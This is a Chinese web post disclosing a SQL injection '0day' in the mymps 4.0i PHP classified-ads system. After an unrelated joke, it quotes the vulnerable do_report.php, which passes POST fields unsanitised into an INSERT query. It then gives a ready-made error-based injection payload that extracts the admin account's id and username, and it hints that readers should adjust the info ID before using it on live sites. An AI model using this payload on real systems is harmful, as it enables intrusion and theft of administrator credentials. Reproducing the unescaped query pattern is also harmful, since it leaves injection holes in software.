当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

蚂蚁php分类信息系统mymps 4.0i utf版0Day

时间:2013/4/19 12:10:00 作者:平凡之路 来源:xuhantao.com 浏览:


原因:

老婆说自己月经怎么还不来呢,急死了。。。突然老婆月经来了。囧,这是事实。。。涛涛电脑知识

老婆说:“你个屌丝,懂什么是月经么。”

作者说:“不懂!”。

老婆说“那你去做你屌丝应该做的事情吧,必须先把我送回去,不然你让我自己走,我会晕倒的!”。我流泪了。

谢谢老婆,你原谅我是一位屌丝。

文件do_report.php

 

<?php

!defined('IN_MYMPS') && exit('FORBIDDEN');

require_once MYMPS_DATA."/config.db.php";

require_once MYMPS_INC."/db.class.php";

$ip                  = GetIP();

$infoid                 = isset($_POST['infoid'])           ? intval($_POST['infoid'])  : '';

$infotitle         = isset($_POST['infotitle']) ? trim($_POST['infotitle']) : ''; //

 $content         = isset($_POST['content']) ? trim($_POST['content']) : '';//

$report_type = isset($_POST['report_type']) ? trim($_POST['report_type']) : '';//

 

if(mymps_count("info_report","WHERE infoid = '$infoid' AND ip = '$ip' AND pubtime > '".mktime(0,0,0)."'") > 0){

        echo "<center style=\"color:red; font-weight:bold\">操作失败,该信息您已经举报过了!</font>";

        exit;

}

$db->query("INSERT INTO `{$db_mymps}info_report` (report_type,content,infoid,infotitle,ip,pubtime)VALUES('$report_type','$content','$infoid','$infotitle','$ip','".$timestamp."')");

echo "<div style=\"margin:10px 15px\"><font style=\"color:red; font-size:12px\"><h1>感谢您的举报 :)</h1>● 在".$mymps_global[SiteName].",每天有数千条违规信息通过用户举报被删除。● 如果你是不小心点错了举报按钮,别担心。只有当一个信息收到一定数量的举报时才会被删除。</font></div>";

?>

一看都是注入 //

然后看看是哪个文件

上图就是问题所在


利用代码如下:

代码如下

part=do_report&infoid=87382231&infotitle=123','ip1',(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20concat(0x6F756F757E,userid,0x2D,uname,0x7E31)%20FROM%20my_admin%20where id=1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a))#&report_type=2&content=asasas

 

infoid需要修改下,不然,你懂的。哈哈。

相关文章
  • 没有相关文章
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1